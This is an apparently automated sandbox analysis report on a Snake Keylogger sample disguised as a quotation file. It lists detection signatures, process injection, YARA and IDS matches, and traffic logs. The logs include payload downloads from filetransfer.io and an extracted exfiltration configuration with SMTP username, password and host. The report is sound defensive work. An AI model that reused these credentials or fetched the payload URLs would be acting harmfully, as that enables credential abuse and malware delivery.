Windows Analysis Report
QUOTATION_NOVQTRA071244PDF.scr.exe

Overview

General Information

Sample name: QUOTATION_NOVQTRA071244PDF.scr.exe
Analysis ID: 1559133
MD5: 5287698c5838c217c8330670920d1f22
SHA1: 61d94cd397d56e87a13207f680f88fdf829eef71
SHA256: 852c78744e828250542bb9ddf2d7f2797c5613d2ab69cbd0faff944469d2c03b
Tags: exe, scr, user-abuse_ch
Infos:

Detection

Snake Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Snake Keylogger
.NET source code contains potential unpacker
AI detected suspicious sample
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Creates a thread in another existing process (thread injection)
Initial sample is a PE file and has a suspicious name
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file does not import any functions
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: AspNetCompiler Execution
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Classification

  • System is w10x64
  • QUOTATION_NOVQTRA071244PDF.scr.exe (PID: 7268 cmdline: "C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe" MD5: 5287698C5838C217C8330670920D1F22)
    • aspnet_compiler.exe (PID: 7792 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe" MD5: DF5419B32657D2896514B6A1D041FE08)
      • conhost.exe (PID: 7804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Username": "abbsend@qlststv.com", "Password": "G!!HFpD@N*]*nF", "Host": "gator3220.hostgator.com", "Port": "587", "Version": "5.1"}
Source | Rule | Description | Author | Strings
00000004.00000002.2961287104.0000019050ECE000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security |
00000004.00000002.2959415202.000001904EEC0000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_Donutloader_f40e3759 | unknown | unknown |
  • 0x21508:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
  • 0x24a3e:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000000.00000002.2214752450.0000022880090000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
00000000.00000002.2215561209.00000228E70FA000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Donutloader_f40e3759 | unknown | unknown |
  • 0x1ff0:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
  • 0x5526:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000004.00000002.2963455838.0000019060C89000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security |

Source | Rule | Description | Author | Strings
0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.22880090000.0.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
4.2.aspnet_compiler.exe.19060c900e8.1.unpack | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security |
4.2.aspnet_compiler.exe.19060c900e8.1.unpack | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown |
  • 0x1259b:$a1: get_encryptedPassword
  • 0x1287f:$a2: get_encryptedUsername
  • 0x123a7:$a3: get_timePasswordChanged
  • 0x124a2:$a4: get_passwordField
  • 0x125b1:$a5: set_encryptedPassword
  • 0x13b86:$a7: get_logins
  • 0x13ae9:$a10: KeyLoggerEventArgs
  • 0x13782:$a11: KeyLoggerEventArgsEventHandler
4.2.aspnet_compiler.exe.19060c900e8.1.unpack | MAL_Envrial_Jan18_1 | Detects Encrial credential stealer malware | Florian Roth |
  • 0x19e95:$a2: \Comodo\Dragon\User Data\Default\Login Data
  • 0x190c7:$a3: \Google\Chrome\User Data\Default\Login Data
  • 0x194fa:$a4: \Orbitum\User Data\Default\Login Data
  • 0x1a539:$a5: \Kometa\User Data\Default\Login Data
4.2.aspnet_compiler.exe.19060c900e8.1.unpack | INDICATOR_SUSPICIOUS_EXE_DotNetProcHook | Detects executables with potential process hoocking | ditekSHen |
  • 0x1311a:$s1: UnHook
  • 0x13121:$s2: SetHook
  • 0x13129:$s3: CallNextHook
  • 0x13136:$s4: _hook

            System Summary

            Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe", CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe, ParentCommandLine: "C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe", ParentImage: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe, ParentProcessId: 7268, ParentProcessName: QUOTATION_NOVQTRA071244PDF.scr.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe", ProcessId: 7792, ProcessName: aspnet_compiler.exe
            Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
            2024-11-20T08:19:02.546000+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49741 | 188.114.97.3 | 443 | TCP
            2024-11-20T08:19:03.803744+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49744 | 188.114.97.3 | 443 | TCP
            2024-11-20T08:19:00.694601+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49739 | 193.122.6.168 | 80 | TCP
            2024-11-20T08:19:01.944617+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49739 | 193.122.6.168 | 80 | TCP
            2024-11-20T08:19:03.257175+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49742 | 193.122.6.168 | 80 | TCP
            2024-11-20T08:19:04.632112+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49745 | 193.122.6.168 | 80 | TCP
            2024-11-20T08:19:05.913370+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49758 | 193.122.6.168 | 80 | TCP
            2024-11-20T08:19:07.194701+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49765 | 193.122.6.168 | 80 | TCP
            2024-11-20T08:19:08.444614+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49775 | 193.122.6.168 | 80 | TCP
            2024-11-20T08:19:09.913364+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49781 | 193.122.6.168 | 80 | TCP


            AV Detection

            Source: 00000004.00000002.2963455838.0000019060C89000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "abbsend@qlststv.com", "Password": "G!!HFpD@N*]*nF", "Host": "gator3220.hostgator.com", "Port": "587", "Version": "5.1"}
            Source: QUOTATION_NOVQTRA071244PDF.scr.exeReversingLabs: Detection: 36%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

            Location Tracking

            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49740 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49731 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49732 version: TLS 1.2
            Source: QUOTATION_NOVQTRA071244PDF.scr.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2215561209.00000228E7016000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6C31000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6C81000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2214866648.0000022880380000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2215561209.00000228E7016000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6C31000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6C81000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2214866648.0000022880380000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: protobuf-net.pdbSHA256}Lq source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2214794114.0000022880110000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6D46000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6F2C000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: protobuf-net.pdb source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2214794114.0000022880110000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6D46000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6F2C000.00000004.00000800.00020000.00000000.sdmp
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeCode function: 4x nop then jmp 00007FFD9B96A235h4_2_00007FFD9B969E4D
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeCode function: 4x nop then jmp 00007FFD9B969C1Bh4_2_00007FFD9B9699B0
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeCode function: 4x nop then jmp 00007FFD9B967470h4_2_00007FFD9B967419
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeCode function: 4x nop then jmp 00007FFD9B96A235h4_2_00007FFD9B96A151
            Source: global trafficHTTP traffic detected: GET /data-package/I7fmQg9d/download HTTP/1.1Host: filetransfer.ioConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /storage/download/ndvzPJWaMUSB HTTP/1.1Host: s24.filetransfer.ioConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
            Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49745 -> 193.122.6.168:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49758 -> 193.122.6.168:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49742 -> 193.122.6.168:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49781 -> 193.122.6.168:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49765 -> 193.122.6.168:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49775 -> 193.122.6.168:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49739 -> 193.122.6.168:80
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49741 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49744 -> 188.114.97.3:443
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49740 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficDNS traffic detected: DNS query: filetransfer.io
            Source: global trafficDNS traffic detected: DNS query: s24.filetransfer.io
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050E3B000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050E4D000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050EA8000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050E74000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050D96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
            Source: aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050D96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050C81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: aspnet_compiler.exe, 00000004.00000002.2963455838.0000019060C89000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2960594780.0000019050AE0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
            Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2215561209.00000228E6C21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://filetransfer.io
            Source: QUOTATION_NOVQTRA071244PDF.scr.exeString found in binary or memory: http://filetransfer.io/data-package/I7fmQg9d/download
            Source: aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050E3B000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050E4D000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050EA8000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050E74000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050DB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
            Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2215561209.00000228E6C21000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050C81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: aspnet_compiler.exe, 00000004.00000002.2960737490.0000019050B9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.coH
            Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2215561209.00000228E6C61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://filetransfer.io
            Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2215561209.00000228E6CCE000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2215561209.00000228E6C61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://filetransfer.io/data-package/I7fmQg9d/download
            Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2214794114.0000022880110000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6D46000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6F2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
            Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2214794114.0000022880110000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6D46000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6F2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
            Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2214794114.0000022880110000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6D46000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6F2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
            Source: aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050E3B000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050DE4000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050E4D000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050EA8000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050E74000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050D96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: aspnet_compiler.exe, 00000004.00000002.2963455838.0000019060C89000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2960594780.0000019050AE0000.00000004.08000000.00040000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050D96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050D96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75
            Source: aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050D96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75p
            Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2215561209.00000228E6C94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://s24.filetransfer.io
            Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2215561209.00000228E6C94000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2215561209.00000228E6C90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://s24.filetransfer.io/storage/download/ndvzPJWaMUSB
            Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2214794114.0000022880110000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6D46000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6F2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
            Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2214794114.0000022880110000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2215561209.00000228E6D71000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6D46000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6F2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
            Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2214794114.0000022880110000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6D46000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6F2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354

            System Summary

            Source: 4.2.aspnet_compiler.exe.19060c900e8.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 4.2.aspnet_compiler.exe.19060c900e8.1.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 4.2.aspnet_compiler.exe.19060c900e8.1.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 4.2.aspnet_compiler.exe.19060c900e8.1.unpack, type: UNPACKEDPE Matched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 4.2.aspnet_compiler.exe.19050ae0000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 4.2.aspnet_compiler.exe.19050ae0000.0.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 4.2.aspnet_compiler.exe.19050ae0000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 4.2.aspnet_compiler.exe.19050ae0000.0.unpack, type: UNPACKEDPE Matched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 4.2.aspnet_compiler.exe.19050ae0000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 4.2.aspnet_compiler.exe.19050ae0000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 4.2.aspnet_compiler.exe.19050ae0000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 4.2.aspnet_compiler.exe.19050ae0000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 4.2.aspnet_compiler.exe.19060c900e8.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 4.2.aspnet_compiler.exe.19060c900e8.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 4.2.aspnet_compiler.exe.19060c900e8.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 4.2.aspnet_compiler.exe.19060c900e8.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 00000004.00000002.2959415202.000001904EEC0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
            Source: 00000000.00000002.2215561209.00000228E70FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
            Source: 00000004.00000002.2963455838.0000019060C89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 00000004.00000002.2963455838.0000019060C89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 00000004.00000002.2960594780.0000019050AE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 00000004.00000002.2960594780.0000019050AE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 00000004.00000002.2960594780.0000019050AE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 00000004.00000002.2960594780.0000019050AE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 00000000.00000002.2222200198.00000228F6D46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
            Source: Process Memory Space: aspnet_compiler.exe PID: 7792, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: Process Memory Space: aspnet_compiler.exe PID: 7792, type: MEMORYSTR Matched rule: Detects Snake Keylogger Author: ditekSHen
            Source: initial sample Static PE information: Filename: QUOTATION_NOVQTRA071244PDF.scr.exe
            Source: QUOTATION_NOVQTRA071244PDF.scr.exe Static PE information: No import functions for PE file found
            Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2215561209.00000228E7016000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs QUOTATION_NOVQTRA071244PDF.scr.exe
            Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2214794114.0000022880110000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs QUOTATION_NOVQTRA071244PDF.scr.exe
            Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000000.1718879374.00000228E4E83000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamePzlcy.exeH vs QUOTATION_NOVQTRA071244PDF.scr.exe
            Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6C31000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs QUOTATION_NOVQTRA071244PDF.scr.exe
